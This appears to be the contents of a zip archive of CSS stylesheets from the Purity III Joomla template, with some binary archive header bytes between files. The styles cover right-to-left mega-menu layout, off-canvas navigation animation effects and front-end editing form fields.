  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    right: auto;
    left: 0 !important;
    margin-left: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-right: auto;
  margin-left: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-right: -20px;
  margin-left: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-right: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #0077bb;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}


html[dir="rtl"] .t3-megamenu .mega-align-center > .dropdown-menu {
  -webkit-transform: translate(50%, 0);
  -ms-transform: translate(50%, 0);
  -o-transform: translate(50%, 0);
  transform: translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu .mega-nav .dropdown-submenu > a:after {
  direction: ltr;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
  -webkit-transform-origin: 80% 20%;
  -moz-transform-origin: 80% 20%;
  -ms-transform-origin: 80% 20%;
  transform-origin: 80% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
  -webkit-transform: scale(0, 0) translate(50%, 0);
  -ms-transform: scale(0, 0) translate(50%, 0);
  transform: scale(0, 0) translate(50%, 0);
  -webkit-transform-origin: 100% 20%;
  -moz-transform-origin: 100% 20%;
  -ms-transform-origin: 100% 20%;
  transform-origin: 100% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
  transform: scale(1, 1) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
  transform: scale(1, 0) translate(50%, 0);
  -webkit-transform: scale(1, 0) translate(50%, 0);
  -ms-transform: scale(1, 0) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
  transform: scale(1, 1) translate(50%, 0);
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
}PKӜ�\�����Q�Q!purity_iii/css/rtl/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  right: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  right: auto;
  left: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #0077bb;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #00466e;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  right: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #bbe6ff;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  right: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #0067a2;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-right: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 12px 0 0;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  left: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #0077bb;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #00466e;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}


@media (max-width: 990px) {
  .off-canvas body > * {
    left: 0;
    -webkit-transform: translateX(0%);
    -ms-transform: translateX(0%);
    transform: translateX(0%);
  }
  .off-canvas #off-canvas-nav .t3-mainnav {
    -webkit-transform: translateX(100%);
    -ms-transform: translateX(100%);
    transform: translateX(100%);
  }
  .off-canvas-enabled body > * {
    -webkit-transform: translateX(-250px);
    -ms-transform: translateX(-250px);
    transform: translateX(-250px);
  }
}
.off-canvas-left.t3-off-canvas {
  left: 0;
  right: auto;
}
.off-canvas-left.old-ie .t3-off-canvas {
  left: -250px;
  right: auto;
}PKӜ�\���.�H�H+purity_iii/css/rtl/orange/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
